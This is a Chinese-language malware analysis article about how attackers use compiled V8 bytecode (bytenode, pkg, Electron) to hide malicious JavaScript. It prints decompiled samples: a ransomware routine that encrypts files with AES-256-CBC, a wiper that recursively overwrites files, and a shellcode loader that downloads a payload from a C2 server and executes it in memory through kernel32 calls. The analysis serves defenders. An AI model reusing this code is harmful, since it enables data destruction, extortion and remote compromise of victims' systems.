V8编译
const vm = require('vm');
// Compiling JavaScript into serialized bytecode
let helloWorld = new vm.Script("console.log('hello world!')", { produceCachedData: true });
let compiledBuffer = helloWorld.cachedData;
const bytenode = require('bytenode');
// Compiling JavaScript into bytecode and executing it
bytenode.compileFile('script.js', 'script.jsc'); // Compiling JavaScript to bytecode
require('./script.jsc'); // Running the compiled bytecode
struct CahcedDataHeaders
{
static const uint32_t kMagicNumber; // 0xC0DE0000 ^ ExternalReferenceTable::kSize
static const uint32_t kVersionHash; // V8 version hashed
static const uint32_t kSourceHash; // Original source code length
static const uint32_t kFlagHash // V8 flags hashed
static const uint32_t kPayloadLength // Bytecode length
static const uint32_t kChecksum // Bytecode Adler-32 checksum
};
V8执行
-
提供编译后的脚本以及兼容V8版本的Node.js引擎; -
使用节点打包器(如PKG或NEXE)将NodeJS平台与已编译脚本打包成单个可执行文件。在PKG的情况下,包程序默认编译所有的脚本文件; -
利用Electron框架,允许使用web技术开发跨平台桌面应用程序。
ChromeLoader
勒索软件和擦除器(wiper)
function encryptFile_0000023737FA04E9(file_name) {
{
r6 = fs["statSync"](file_name)
if (r6["size"] > 100000000)
{
return undefined
}
r6 = isHiddenFile(file_name)
if (r6 == true)
{
return undefined
}
r1 = crypto["createCipheriv"]("aes-256-cbc", key, iv)
r2 = fs["createReadStream"](file_name)
r3 = fs["createWriteStream"](file_name)
r7 = r2["pipe"](r1)
ACCU = r7["pipe"](r3)
ACCU = r3["on"]("finish", SharedFunctionInfo_0000023737FA0769)
return undefined
}
function destroyFiles_000000CBE13DDDC1(a0) {
Scope[2][2] = a0
r0 = fs["readdirSync"](Scope[2][2])
ACCU = r0["forEach"](SharedFunctionInfo_000000CBE13DDF51)
return undefined
}
function SharedFunctionInfo_000000CBE13DDF51(a0) {
r0 = path["join"](Scope[2][2], a0)
r1 = fs["statSync"](r0)
if (r1["isDirectory"]())
{
ACCU = destroyFiles_000000CBE13DDDC1(r0)
}
else
{
r9 = "Math"["random"]()
r6 = string_list["Math"["floor"]((string_list["length"] * r9))]
r5 = r0
ACCU = fs["writeFileSync"](r5, r6, "utf8")
}
return undefined
}
Shellcode加载器
http = require("http")
r3 = require("./update.js") // configuration file containing C2
ffi_napi = require("ffi-napi")
ref_napi = require("ref-napi")
Scope[1][4] = ref_napi["types"]["uint64"]
Scope[1][5] = ref_napi["types"]["uint32"]
Scope[1][6] = ref_napi["types"]["void"]
Scope[1][7] = ref_napi["refType"](Scope[1][6])
Scope[1][8] = Scope[1][7]
Scope[1][9] = ref_napi["refType"](Scope[1][5])
r4 = http["get"](r3["UpdateSoftware"], get_shellcode)
ACCU = r4["on"]("error", SharedFunctionInfo_000002F3D955EA09)
r1 = ffi_napi["Library"]("kernel32", r7)
r6 = r1
r2 = r1["VirtualAlloc"](null, shellcode_buffer["length"], 12288, 64)
r6 = r1
r7 = r2
ACCU = r1["RtlMoveMemory"](r7, shellcode_buffer, shellcode_buffer["length"])
r7 = ref_napi["refType"](ref_napi["types"]["uint32"])
r3 = ref_napi["alloc"](r7)
r6 = r1
r9 = r2
r12 = r3
r4 = r1["CreateThread"](null, 0, r9, null, 0, r12)
ACCU = r1["WaitForSingleObject"](r4, 4294967295.0)
原文始发于微信公众号(FreeBuf):探索编译的V8 JavaScript在恶意软件中的应用
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论